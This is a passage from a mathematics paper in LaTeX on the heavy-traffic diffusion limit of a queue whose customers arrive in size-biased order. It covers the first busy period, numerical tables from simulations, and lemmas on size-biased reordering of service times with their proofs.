By the Continuous-Mapping Theorem and Theorem \ref{th:first_busy_period_convergence} we have the following:
\begin{theorem}[Number of customers served in the first busy period]\label{th:first_busy_period_convergence}%
Assume that $\alpha\in[0,1]$, $\mathbb E[S^{2+\alpha}]<\infty$ and that the heavy-traffic condition \eqref{eq:crit} holds. Assume further that $\mathbf Q_n(0) = q $. Then, as $n\rightarrow\infty$, the number of customers served in the first busy period $\mathrm{BP}_n:=H_{\mathbf{Q}_n}(0)$ converges to
\begin{equation}%
\mathrm{BP}_n \sr{\mathrm d}{\rightarrow} H_{\phi(W)}(0),
\end{equation}%
where $W(\cdot)$ is given in \eqref{eq:main_theorem_delta_G_1_diffusion_definition}.
\end{theorem}%
}
In particular, if $\vert \mathcal F_n \vert$ denotes the number of vertices in the forest constructed from the $\DGa$ queue in Remark \ref{rem:directed_random_tree_model}, as $n\rightarrow\infty$,
\begin{equation}%
\vert \mathcal F_n \vert \sr{\mathrm d}{\rightarrow} H_{\phi(W)}(0).
\end{equation}%
{
Theorem \ref{th:main_theorem_delta_G_1} implies that the typical queue length for the $\DGa$ system in heavy traffic is $O_{\mathbb P}(n^{1/3})$, and that the typical busy period consists of $O_{\mathbb P}(n^{2/3})$ services. The linear drift $t\rightarrow\beta \lambda t$ describes the position of the system inside the critical window. For $\beta>0$ the system is initially overloaded and the process $W(\cdot)$ is more likely to cause a large initial excursion. For $\beta<0$ the traffic intensity approaches $1$ from below, so that the system is initially stable. Consequently, the process $W(\cdot)$ has a strong initial negative drift, so that $\phi(W)(\cdot)$ is close to zero also for small $t$. Finally, the negative quadratic drift $t\rightarrow - \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2$ captures the \emph{depletion-of-points effect}. Indeed, for large times, the process $W(t)$ is dominated by $- \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2$, so that $\phi(W)(t)$ performs only small excursions away from zero. See Figure \ref{fig:stable_motion_different_linear_drift_examples}.
\begin{figure}[hbt]
\centering
\includestandalone[mode=image]{sample_paths}
\caption{Sample paths of the process $\mathbf Q_n(\cdot)$ for various values of $\alpha$ and $n= 10^4$. The service times are taken unit-mean exponential. The dashed curves represent the drift $t\mapsto q+ \beta t - \lambda \mathbb E[S^{1+2\alpha}]/(2\mathbb E[S^{\alpha}]) t^2$. In all plots, $q = 1$, $\beta=1$, $\lambda=1/\mathbb E[S^{1+\alpha}]$.}
\label{fig:stable_motion_different_linear_drift_examples}
\end{figure}
Let us now compare Theorem \ref{th:main_theorem_delta_G_1} with two known results.
For $\alpha = 0$, the limit diffusion simplifies to
\begin{equation}\label{eq:limit_diffusion_alpha_0}
W(t) = \beta t- \frac{1}{2} t^2 + \sigma B(t),
\end{equation}
with $\sigma ^2 = \lambda^2 \mathbb E[S^2]$, in agreement with \cite[Theorem 5]{bet2014heavy}. In \cite{bhamidi2010scaling} it is shown that, when $(\mathcal W_i)_{i\in[n]}$ are i.i.d.~and further assuming that $\mathbb E[\mathcal W^2]/\mathbb E[\mathcal W] = 1$, the exploration process of the corresponding inhomogeneous random graph converges to
\begin{align}%
\overline{W}(t) &= \beta t - \frac{\mathbb E[\mathcal W^3]}{2\mathbb E[\mathcal W^2]^2}t^2 + {\frac{\sqrt{\mathbb E[\mathcal W]\mathbb E[\mathcal W^3]}}{\mathbb E[\mathcal W^2]}} B(t).
\end{align}%
For $\alpha = 1$, \eqref{eq:main_theorem_delta_G_1_diffusion_definition} can be rewritten using \eqref{eq:crit} as
\begin{equation}\label{eq:limit_diffusion_alpha_1}%
W(t) = \beta t - \frac{\mathbb E[S^3]}{2\mathbb E[S^2]^2} t^2 + {\frac{\sqrt{\mathbb E[S]\mathbb E[S^3]}}{\mathbb E[S^2]}}B(t).
\end{equation}%
Therefore the two processes coincide if $\mathcal W_i = S_i$, as expected.
\subsection{Numerical results}
We now use Theorem \ref{th:first_busy_period_convergence} to obtain numerical results for the first busy period. We shall also use the explicit expression of the probability density function of the first passage time of zero of $\phi(W)$ obtained by Martin-L\"of \cite{martin1998final}, see also \cite{hofstad2010critical}. Let Ai$(x)$ and Bi$(x)$ denote the classical Airy functions (see \cite{abramowitz1964handbook}). The first passage time of zero of $W(t) = q + \beta t -1/2t^2 + \sigma B(t)$ has probability density \cite{martin1998final}
\begin{equation}\label{eq:first_busy_period_density}%
f(t;\beta,\sigma) = \mathrm e^{-((t-\beta)^3+\beta^3)/6\sigma^2-\beta a}\int_{-\infty}^{+\infty}\mathrm e^{tu}\frac{\mathrm{Bi}(cu)\mathrm{Ai}(c(u-a))-\mathrm{Ai}(cu)\mathrm{Bi}(c(u-a))}{\pi(\mathrm{Ai}(cu)^2 + \mathrm{Bi}(cu)^2)}\mathrm{d} u,
\end{equation}%
where $c = (2\sigma^2)^{1/3}$ and $a=q/\sigma^2>0$. The result \eqref{eq:first_busy_period_density} can be extended to a diffusion with a general quadratic drift through the scaling relation $W(\tau^2 t) = \tau(q/\tau + \beta \tau t - \tau^3 t^2/2 + \sigma B(t))$.
\begin{figure}[!hbt]
\centering
\includestandalone[mode=image|tex]{first_busy_period_density}
\caption{Density plot (black) and Gaussian kernel density estimates (colored) obtained by running $10^6$ simulations of a $\Delta_{(i)}^{\alpha}/G/1$ queue with $n=\,100,\,1000,\,10000$ customers and $\alpha = 0,~1/2,~1$. In all cases, the service times are exponentially distributed and $q=\beta=\mathbb E[S]=1$.}
\label{fig:distribution_first_busy_period}
\end{figure}
Figure \ref{fig:distribution_first_busy_period} shows the empirical density of $\mathrm{BP}_n$, for increasing values of $n$ and various values of $\alpha$, together with the exact limiting value \eqref{eq:first_busy_period_density}.
\begin{table}[!htbp]
\centering
\begin{tabular}{ c c c c c c c c c c}
& \multicolumn{3}{ c }{Deterministic} & \multicolumn{3}{ c }{Exponential}& \multicolumn{3}{ c }{Hyperexponential}\\
$\alpha$ & 0 & 1/2 & 1 & 0 & 1/2 & 1 & 0 & 1/2 & 1\\
\hline
$n$ \\
\multicolumn{1}{r}{$10^1$} & 1.1318 & 1.1318 & 1.1318 & 1.0359 & 0.8980 & 0.7429 & 0.8920 & 0.6356 & 0.5332 \\
\multicolumn{1}{r}{$10^2$} & 1.5842 & 1.5842 & 1.5842 & 1.3584 & 1.0924 & 0.8333 & 1.0959 & 0.7454 & 0.5525 \\
\multicolumn{1}{r}{$10^3$} & 1.9188 & 1.9188 & 1.9188 & 1.6387 & 1.2506 & 0.9284 & 1.2936 & 0.8352 & 0.6134 \\
\multicolumn{1}{r}{$10^4$} & 2.1474 & 2.1474 & 2.1474 & 1.8419 & 1.3925 & 1.0014 & 1.4960 & 0.9210 & 0.6554 \\
\multicolumn{1}{c}{$\infty$~~} & 2.3374 & 2.3374 & 2.3374 & 2.0038 & 1.4719 & 1.0440 & 1.6242 & 0.9717 & 0.6881
\end{tabular}
\caption{Numerical values of $n^{-2/3}\mathbb E[\mathrm{BP}_n]$ for different population sizes and the exact expression for $n=\infty$ computed using \eqref{eq:first_busy_period_density}. The service requirements are displayed in order of increasing coefficient of variation. In all cases $q = \beta = \mathbb E[S] = 1$. The hyperexponential service times follow a rate $\lambda_1 = 0.501$ exponential distribution with probability $p_1=1/2$ and a rate $\lambda_2 = 250.5$ exponential distribution with probability $p_2=1-p_1=1/2$. Each value for finite $n$ is the average of $10^4$ simulations. }\label{tab:convergence_expectation_busy_period}
\end{table}
Table \ref{tab:convergence_expectation_busy_period} shows the mean busy period for different choices of $\alpha$ and different service time distributions. We computed the exact value for $n=\infty$ by numerically integrating \eqref{eq:first_busy_period_density}.
Observe that $\mathbb E[\mathrm{BP}_n]$ decreases with $\alpha$. This might seem counterintuitive, because the larger $\alpha$, the more likely customers with larger service join the queue early, who in turn might initiate a large busy period. Let us explain this apparent contradiction. When the arrival rate $\lambda$ is fixed, assumption \eqref{eq:crit} does not necessarily hold and $\mathbb E[\mathrm{BP}_n]$ increases with $\alpha$, as can be seen in Table \ref{tab:fixed_lambda_mean_busy_period}.
\begin{table}[!b]%
\centering
\begin{tabular}{c c c c c c}
&\multicolumn{5}{c}{ Exponential }\\
$\alpha$ & 0 & 1/4 & 1/2 & 3/4 & 1 \\
\hline
$n$ \\
$10^1$ & 1.0854 & 1.0922 & 1.1053 & 1.1118 & 1.1306 \\
$10^2$ & 5.9515 & 8.1928 & 11.4478 & 16.3598 & 22.0381 \\
\end{tabular}
\caption{Expected number of customers served in the first busy period of the \emph{nonscaled} $\Delta_{(i)}^{\alpha}/G/1$ queue with mean one exponential service times and arrival rate $\lambda = 0.01$. In all cases $q=1$. Each value is the average of $10^4$ simulations.}\label{tab:fixed_lambda_mean_busy_period}
\end{table}%
However, our heavy-traffic condition \eqref{eq:crit} implies that $\lambda$ depends on $\alpha$ since $\lambda = 1/\mathbb E[S^{1+\alpha}]$. The interpretation of condition \eqref{eq:crit} is that, on average, one customer joins the queue during one service time. Notice that, due to the size-biasing, the average service time is not $\mathbb E[S]$. Therefore, the number of customers that join during a (long) service is roughly equal to one as $\alpha\uparrow 1$. However, when customers with large services leave the system, they are not able to join any more. As $\alpha\uparrow 1$, customers with large services leave the system earlier. Therefore, as $\alpha\uparrow1$, the resulting second order \emph{depletion-of-points effect} causes shorter excursions as time progresses, see also Figure \ref{fig:stable_motion_different_linear_drift_examples}. In the limit process, this phenomenon is represented by the fact that the coefficient of the negative quadratic drift increases as $\alpha\uparrow1$, as shown in the following lemma.
{
\begin{lemma}%
Let
\begin{equation}\label{eq:coefficient_negative_quadratic_drift}%
\alpha\mapsto f(\alpha) := \frac{\mathbb E[S^{1+2\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]}.
\end{equation}%
Then $f'(\alpha)\geq0$.
\end{lemma}%
}
\begin{proof}%
Since
\begin{equation}%
f'(\alpha) = \frac{2\mathbb E[\log(S)S^{1+2\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]} - \frac{\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]^2\mathbb E[S^{1+\alpha}]} - \frac{\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{1+\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]^2},
\end{equation}%
$f'(\alpha)\geq 0$ if and only if
\begin{align}%
2 \mathbb E[\log(S)S^{1+2\alpha}]\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}] &\geq\mathbb E[S^{1+\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}] \notag\\
&\quad+ \mathbb E[S^{\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{1+\alpha}].
\end{align}%
We split the left-hand side in two identical terms and show that each of them dominates one term on the right-hand side. That is
\begin{equation}\label{eq:coefficient_negative_drift_proof_first_term}%
\mathbb E[\log(S)S^{1+2\alpha}]\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}] \geq \mathbb E[S^{1+\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}],
\end{equation}%
the proof of the second bound being analogous. The inequality \eqref{eq:coefficient_negative_drift_proof_first_term} is equivalent to
\begin{equation}\label{eq:coefficient_negative_drift_proof_first_term_rewritten}%
\frac{\mathbb E[(\log(S)S^{1+\alpha})S^{\alpha}]}{\mathbb E[S^{\alpha}]} \geq \frac{\mathbb E[S^{1+\alpha}S^{\alpha}]}{\mathbb E[S^{\alpha}]}\frac{\mathbb E[\log(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]}.
\end{equation}%
The term on the left and the two terms on the right can be rewritten as the expectation of a size-biased random variable $W$, so that \eqref{eq:coefficient_negative_drift_proof_first_term_rewritten} is equivalent to
\begin{equation}\label{eq:coefficient_negative_drift_proof_final}%
\mathbb E[\log(W)W^{1+\alpha}] \geq \mathbb E[\log(W)]\mathbb E[W^{1+\alpha}] .
\end{equation}%
Finally, the inequality \eqref{eq:coefficient_negative_drift_proof_final} holds because $W$ is positive with probability one and $x\mapsto\log(x)$ and $x\mapsto x^{1+\alpha}$ are increasing functions.
\end{proof}%
\section{Overview of the proof of the scaling limit}\label{sec:overview_proof}
The proof of Theorem \ref{th:main_theorem_delta_G_1} extends the techniques we developed in \cite{bet2014heavy}. However, the dependency structure of the arrival times complicates the analysis considerably. Customers with larger job sizes have a higher probability of joining the queue quickly, and this gives rise to a
size-biasing reordering of the service times. In the next section we study this phenomenon in detail.
\subsection{Preliminaries} \label{sec:preliminaries}
Given two sequences of random variables $(X_n)_{n\geq1}$ and $(Y_n)_{n\geq1}$, we say that $X_n$ converges in probability to $X$, and we denote it by $X_n\sr{\mathbb P}{\rightarrow} X$, if $\mathbb P (\vert X_n - X\vert >\varepsilon) \rightarrow0$ as $n\rightarrow0$ for each $\varepsilon>0$. We also write $X_n = o_{\mathbb P}(Y_n)$ if $X_n/Y_n \stackrel{\mathbb P}{\rightarrow}0$ and $X_n=O_{\mathbb P}(Y_n)$ if $(X_n/Y_n)_{n\geq1}$ is tight. Given two real-valued random variables $X$, $Y$ we say that $X$ \emph{stochastically dominates} $Y$ and denote it by $Y\preceq X$, if $\mathbb{P}(X\leq x) \leq \mathbb P(Y\leq x)$ for all $x\in\mathbb R$.
For our results, we condition on the entire sequence $(S_i)_{i\geq1}$. More precisely, if the random variables that we consider are defined on the probability space $(\Omega, {\mathcal F}, {\mathbb P})$, then we define a new probability space $(\Omega, \mathcal F_{\scriptscriptstyle S}, \mathbb P_{\sss S})$, with $ \mathbb P_{\sss S}(A) := {\mathbb P}(A\vert(S_i)_{i=1}^{\infty})$ and $\mathcal F_{\scriptscriptstyle S} := \sigma(\{{\mathcal F} , (S_i)_{i=1}^{\infty}\})$, the $\sigma$-algebra generated by $\mathcal F$ and $(S_i)_{i=1}^{\infty}$. Correspondingly, for any random variable $X$ on $\Omega$ we define $\E_{\sss S}[X]$ as the expectation with respect to $\mathbb P_{\sss S}$, and $\mathbb E[X]$ for the expectation with respect to $\mathbb P$. We say that a sequence of events $(\mathcal E_n)_{n\geq1}$ holds with high probability (briefly, w.h.p.) if $\mathbb P (\mathcal E_n) \rightarrow1$ as $n\rightarrow\infty$.
First, we recall a well-known result that will be useful on several occasions.
\begin{lemma}\label{lem:max_iid_random_variables}
Assume $(X_i)_{i=1}^n$ is a sequence of positive i.i.d.~random variables such that $\mathbb E[X_i] <\infty$. Then $\max_{i\in[n]}X_i = o_{\mathbb P}(n)$.
\end{lemma}%
\begin{proof}%
We have the inclusion of events
\begin{equation}
\Big\{\max_{i\in[n]} X_i \geq \varepsilon n \Big\} \subseteq \bigcup_{i=1}^n\Big\{X_i\geq \varepsilon n\Big\}.
\end{equation}%
Therefore,
\begin{equation}
\mathbb P (\max_{i\in[n]} X_i \geq \varepsilon n) \leq \sum_{i=1}^n \mathbb P (X_i \geq \varepsilon n).
\end{equation}%
Since for any positive random variable $Y$, $\varepsilon \mathds 1_{\{Y\geq\varepsilon\}}\leq Y \mathds 1_{\{Y\geq\varepsilon\}} $ almost surely, it follows
\begin{equation}%
\mathbb P (\max_{i\in[n]} X_i \geq \varepsilon n) \leq \frac{\sum_{i=1}^{n}\mathbb E[X_i\mathds 1_{\{X_i\geq\varepsilon n\}}]}{\varepsilon n} = \frac{\mathbb E[X_1 \mathds 1_{\{X_1\geq\varepsilon n\}}]}{\varepsilon}.
\end{equation}%
The right-most term tends to zero as $n\rightarrow\infty$ since $\mathbb E[X_1]<\infty$, and this concludes the proof.
\end{proof}%
Given a vector $\bar x =(x_1,x_2,\ldots,x_n)$ with deterministic, real-valued entries, the size-biased ordering of $\bar x$ is a \emph{random} vector $X\!\begin{smallmatrix}(s)\\
~\end{smallmatrix} = (X\!\begin{smallmatrix}(s)\\
\mkern-12mu1\end{smallmatrix},X\!\begin{smallmatrix}(s)\\
\mkern-12mu2\end{smallmatrix},\ldots,X\!\begin{smallmatrix}(s)\\
\mkern-12mu n\end{smallmatrix})$ such that
\begin{equation}%
\mathbb P (X\!\begin{smallmatrix}(s)\\
\mkern-12mu1\end{smallmatrix} = x_j) = \frac{x_j}{\sum_{l=1}^n x_l},~ \mathbb P (x\!\begin{smallmatrix}(s)\\
\mkern-12mu2\end{smallmatrix} = x_j \mid X\!\begin{smallmatrix}(s)\\
\mkern-12mu1\end{smallmatrix}) = \frac{x_j}{\sum_{l=1}^n x_l - x\!\begin{smallmatrix}(s)\\
\mkern-12mu1\end{smallmatrix}},~\ldots
\end{equation}%
More generally, for any $\alpha\in\mathbb R$ the $\alpha$-size-biased ordering of $\bar x$ is given by a vector $\bar X\!\begin{smallmatrix}(\alpha)\\
~\end{smallmatrix} = (X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu1\end{smallmatrix}, X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu2\end{smallmatrix},\ldots, X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu~n\end{smallmatrix})$ such that
\begin{equation}%
\mathbb P (X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu1\end{smallmatrix} = x_j) = \frac{x^{\alpha}_j}{\sum_{l=1}^n x^{\alpha}_l},~\mathbb P (X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu2\end{smallmatrix} = x_j \mid X\!\begin{smallmatrix}(\alpha)\\
\mkern-12mu1\end{smallmatrix} = x_i) = \frac{x^{\alpha}_j}{\sum_{l=1}^n x^{\alpha}_l - x^{\alpha}_i},~\ldots
\end{equation}%
Finally, we define
\begin{equation}%
\served{k} = \{c(1), \ldots, c(k)\}
\end{equation}%
as the set of the first $k$ customers served. The following lemma is the first step in understanding the structure of the arrival process:
\begin{lemma}[Size-biased reordering of the arrivals]\label{lem:size_biased_reordering}%
The order of appearance of customers is the $\alpha$-size-biased ordering of their service times. In other words,
\begin{equation}%
\mathbb P_{\sss S}(c(j) = i \mid \served{j-1}) = \frac{S_i^{\alpha}}{\sum_{l\notin\served{j-1}}S^{\alpha}_l}.
\end{equation}%
\end{lemma}%
\begin{proof}
Conditioned on $(S_l)_{l=1}^n$, the arrival times are independent exponential random variables. By basic properties of exponentials, we have
\begin{align}\label{eq:size_biased_reordering}%
\mathbb P_{\sss S}&(c(j) = i \mid \served{j-1}) = \mathbb P_{\sss S}(\min\{T_l:~l\notin \served{j-1}\} = T_i\mid \served{j-1}) = \frac{S_i^{\alpha}}{\sum_{l\notin\served{j-1}}S^{\alpha}_l},
\end{align}%
as desired.
\end{proof}
We remark that \eqref{eq:size_biased_reordering} differs from the classical size-biased reordering in that the weights are a \emph{non-linear} function of the $(S_i)_{i=1}^n$.
The next lemma is crucial, establishing stochastic domination between the service requirements of the customers in order of appearance. \bl{In our definition of the queueing process \eqref{eq:queue_length_process}--\eqref{eq:number_arrivals_during_one_service}, we do not keep track of the service requirements of the customers that join the queue, but only of their arrival times \eqref{eq:arrival_times}. Therefore, at the start of service, a customer's service requirement is a random variable that depends on the arrival time relative to the remaining customers. Lemma \ref{lem:size_biased_reordering} then gives the precise distribution of the service requirement of the $j$-th customer entering service.}
Recall that $X$ stochastically dominates $Y$ (with notation $Y\preceq X$) if and only if there exists a probability space $(\bar{\Omega},\bar{ \mathcal F}, \bar{\mathbb P})$ and two random variables $\bar{X}$, $\bar{Y}$ defined on $\bar{\Omega}$ such that $\bar{X}\stackrel{\mathrm d}{=} X$, $\bar{Y}\stackrel{\mathrm d}{=} Y$ and $\bar{\mathbb P}(\bar Y\leq \bar X) = 1$.
\begin{lemma}\label{lem:expectation_service_times_ordering}
Assume that $\alpha>0$. Let $f:\mathbb R^+\rightarrow\mathbb R$ be a function such that $\mathbb E[f(S)S^{\alpha}]<\infty$. Then there exists a constant $C_{f, \scriptscriptstyle S}$ such that almost surely, for $n$ large enough,
\begin{equation}\label{eq:expectation_service_times_ordering}
\E_{\sss S}[f(S_{c(k)})]\leq C_{f,\scriptscriptstyle S}<\infty,
\end{equation}
uniformly in $k\leq c n$, for a fixed $c\in(0,1)$.
\end{lemma}
\begin{proof}
We compute explicitly
\begin{align}%
\E_{\sss S}[f(S_{c(k)})] &= \E_{\sss S}\Big[\frac{\sum_{j\notin\served{k-1}}f(S_j)S_j^{\alpha}}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\notag\\
& = \E_{\sss S}\Big[\frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}- \sum_{j\in\served{k}}f(S_j)S_j^{\alpha}}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\notag\\
& \leq \E_{\sss S}\Big[\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\sum_{j\in[n]}f(S_j)S_j^{\alpha}.
\end{align}%
We have the almost sure bound
\begin{align}%
\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}} &= \frac{1}{\sum_{j\in[n]}S_j^{\alpha} - \sum_{j\in\served{k-1}}S_j^{\alpha}} \leq \frac{1}{\sum_{j\in[n]}S_j^{\alpha} - \sum_{j\in\served{k-1}}S_j^{\alpha}} \notag\\
& \leq \frac{1}{\sum_{j\in[n]}S_j^{\alpha} - \sum_{j=1}^{k-1}S_{(n-j+1)}^{\alpha}} = \frac{1}{\sum_{j=1}^{n-k+1}S_{(j)}^{\alpha}},
\end{align}%
where $S_{(1)}^{\alpha}\leq S_{(2)}^{\alpha}\leq\ldots\leq S_{(n)}^{\alpha}$ denote the order statistics of the finite sequence $(S_i^{\alpha})_{i\in[n]}$.
There exists $p\in(0,1)$ such that $n-k+1\geq p n$, for large enough $n$. Consequently,
\begin{equation}%
\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}} \leq \frac{1}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}},
\end{equation}%
so that we have
\begin{equation}%
\E_{\sss S}[f(S_{c(k)})] \leq \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}.
\end{equation}%
Let us denote by $\xi_p$ the $p$-th quantile of the distribution $F_{\scriptscriptstyle S}(\cdot)$ and let us assume, without loss of generality, that $f_{\scriptscriptstyle S}(\xi_p) > 0$.
Note that $S_{(\lfloor np\rfloor)} = F_{n, \scriptscriptstyle S}^{-1}(\lfloor np \rfloor/n)$, where $F_{n,\scriptscriptstyle S}(t) = \sum_{i=1}^n\mathds 1_{\{S_i\leq t\}}/n$ is the empirical distribution function of the $(S_i)_{i=1}^n$, and $\xi_p = F_{\scriptscriptstyle S}^{-1}(p)$. Indeed, the assumption $f_{\scriptscriptstyle S}(\xi_p)>0$ implies that $F_{\scriptscriptstyle S}(\cdot)$ is invertible in a neighborhood of $\xi_p$.
We have that, as $n\rightarrow\infty$,
\begin{equation}%
S_{(\lfloor np\rfloor)}\sr{\mathrm{a.s.}}{\rightarrow} \xi_p.
\end{equation}%
In particular, as $n\rightarrow\infty$,
\begin{equation}%
\frac{1}{n}\Big\vert \sum_{j\in[n]} S_j \mathds 1_{\{S_j\leq \xi_p\}} - \sum_{j\in[n]}S_j\mathds 1_{\{S_j\leq S_{(\lfloor pn\rfloor)}\}} \Big\vert\sr{\mathrm{a.s.}}{\rightarrow} 0.
\end{equation}%
Therefore, by the strong Law of Large Numbers, as $n\rightarrow\infty$,
\begin{equation}%
\frac{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}}{n}\sr{\mathrm{a.s.}}{\rightarrow} \mathbb E[S\mathds 1_{\{S\leq \xi_p\}}].
\end{equation}%
Then, choosing $C_{n,f,\scriptscriptstyle S} = \mathbb E[f(S)S^{\alpha}]/\mathbb E[S\mathds 1_{\{S\leq \xi_p\}}] + \varepsilon$, for an arbitrary $\varepsilon>0$, gives the desired result.
\end{proof}
If $\alpha >0$, as is the case in our setting, the proof of Lemma \ref{lem:expectation_service_times_ordering} shows that, uniformly in $k=O(n^{2/3})$,
\begin{align}
\E_{\sss S}[f(S_{c(k)})]&\leq \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}\notag\\
&= \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{n}S_{(j)}^{\alpha}}\Big(1 + \frac{\sum_{j=\lfloor pn\rfloor}^{n}S_{(j)}^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}\Big),
\end{align}
and therefore
\begin{equation}\label{eq:average_first_customer_service_time_is_larger}%
\E_{\sss S}[f(S_{c(k)})]\leq \E_{\sss S}[f(S_{c(1)})](1+O_{\PS}(1)).
\end{equation}%
If $f(\cdot)$ is an increasing function, \eqref{eq:average_first_customer_service_time_is_larger} makes precise the intuition that, if $\alpha>0$, customers with larger job sizes join the queue earlier. We will often make use of the expression \eqref{eq:average_first_customer_service_time_is_larger}.
The following lemma will often prove useful in dealing with sums over a random index set:
\begin{lemma}[Uniform convergence of random sums]\label{lem:unif_convergence_random_sums}%
Let $(S_j)_{j=1}^{n}$ be a sequence of positive random variables such that $\mathbb E[S^{2+\alpha}] < + \infty$, for $\alpha\in(0,1)$. Then,
\begin{equation}%
\sup_{\substack{\mathcal X\subseteq[n]\\ \vert \mathcal X \vert = O_{\mathbb P} (n^{2/3})}}\frac{1}{n}\sum_{j\in \mathcal X}S_j^{\alpha} = o_{\mathbb P}(1).
\end{equation}%
\end{lemma}%
\begin{proof}%
By Lemma \ref{lem:max_iid_random_variables}, $\max_{j\in[n]} S_j^{\alpha} = o_{\mathbb P}(n^{\alpha/(2+\alpha)})$. This gives
\begin{align}%
\sup_{\substack{\mathcal X\subseteq[n]\\ \vert \mathcal X \vert = O_{\mathbb P} (n^{2/3})}}\frac{1}{n}\sum_{j\in \mathcal X}S_j^{\alpha} \leq \frac{\max_{j\in[n]}S_j^{\alpha}}{n^{1/3}}O_{\mathbb P}(1) = o_{\mathbb P} (n^{\frac{\alpha-2/3-\alpha/3}{2+\alpha}}) = o_{\mathbb P}(n^{\frac{2}{3}\frac{\alpha-1}{2+\alpha}}).
\end{align}%
Since $\alpha-1 \leq 0$ by assumption, the claim is proven.
\end{proof}%
We now focus on the $i$-th customer joining the queue (for $i$ large) and characterize the distribution of its service time. In particular, for $\alpha>0$ this is different from $S_i$.
\begin{lemma}[Size-biased distribution of the service times]\label{lem:size_biased_distribution}%
For every bounded, real-valued continuous function $f(\cdot)$, as $n\rightarrow\infty$,
\begin{equation}\label{eq:size_biased_distribution}%
\E_{\sss S}[f(S_{c(i)})\mid \mathcal F _{i-1}]\sr{\mathbb P}{\rightarrow}\frac{\mathbb E[f(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]},
\end{equation}%
uniformly for $i=O_{\PS}(n^{2/3})$. Moreover, as $n\rightarrow\infty$,
\begin{equation}%
\E_{\sss S}[f(S_{c(i)})]\rightarrow\frac{\mathbb E[f(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]},\qquad \mathrm{for}~i=O_{\PS}(n^{2/3}).
\end{equation}%
\end{lemma}%
\begin{proof}
First note that
\begin{align}
\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}] &= \sum_{j\notin \served{i-1}}f(S_j)\mathbb P_{\sss S}(c(i) = j \mid\mathcal F_{i-1}) = \sum_{j\notin \served{i-1}}\frac{f(S_j)S_j^{\alpha}}{\sum_{l\notin \served{i-1}}S_l^{\alpha}}.
\end{align}
This can be further decomposed as
\begin{equation}%
\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}] = \frac{\sum_{j=1}^nf(S_j)S_j^{\alpha} - \sum_{j\in\served{i-1}}f(S_j)S_j^{\alpha}}{\sum_{l=1}^nS_l^{\alpha} - \sum_{l\in\served{i-1}}S_l^{\alpha}}.
\end{equation}%
Since $\vert\served{i-1}\vert = i-1$ and $i = O_{\mathbb P}(n^{2/3})$, by the Law of Large Numbers and Lemma \ref{lem:unif_convergence_random_sums},
\begin{align}%
\frac{\sum_{j\notin\served{i-1}}f(S_j)S_j^{\alpha}}{n}\sr{\mathbb P}{\rightarrow} \mathbb E[f(S)S^{\alpha}],\quad\frac{\sum_{l\notin\served{i-1}}S_l^{\alpha}}{n}\sr{\mathbb P}{\rightarrow} \mathbb E[S^{\alpha}].
\end{align}%
uniformly in $i = O_{\mathbb P}(n^{2/3})$. This gives the first claim.
Furthermore, we bound $\E_{\sss S}[f(S_{c(i)})\mid \mathcal F_{i-1}]$ as
\begin{equation}%
\E_{\sss S}[f(S_{c(i)})\mid \mathcal F_{i-1}] = \sum_{j\notin \served{i-1}}\frac{f(S_j)S_j^{\alpha}}{\sum_{l\notin \served{i-1}}S_l^{\alpha}} \leq \sup_{x\geq0}f(x)<\infty.
\end{equation}%
Since $\E_{\sss S}[f(S_{c(i)})] = \E_{\sss S}[\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}]]$, using \eqref{eq:size_biased_distribution} and the Dominated Convergence \mbox{Theorem} the second claim follows.
\end{proof}
In Lemma \ref{lem:size_biased_distribution} we have studied the distribution of the service time of the $i$-th customer, and we now focus on its (conditional) moments. The following lemma should be interpreted as follows: Because of the size-biased re-ordering of the customer arrivals, the service time of the $i$-th customer being served (for $i$ large) is highly concentrated.
\begin{lemma}\label{lem:1+alphaConditionalMoment}%
For any fixed $\gamma\in[-1,1]$,
\begin{equation}\label{eq:1+alphaConditionalMoment}%
\E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] = \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]} + o_{\mathbb P}(1)\quad\mathrm{for}~i = O_{\PS}(n^{2/3}),
\end{equation}%
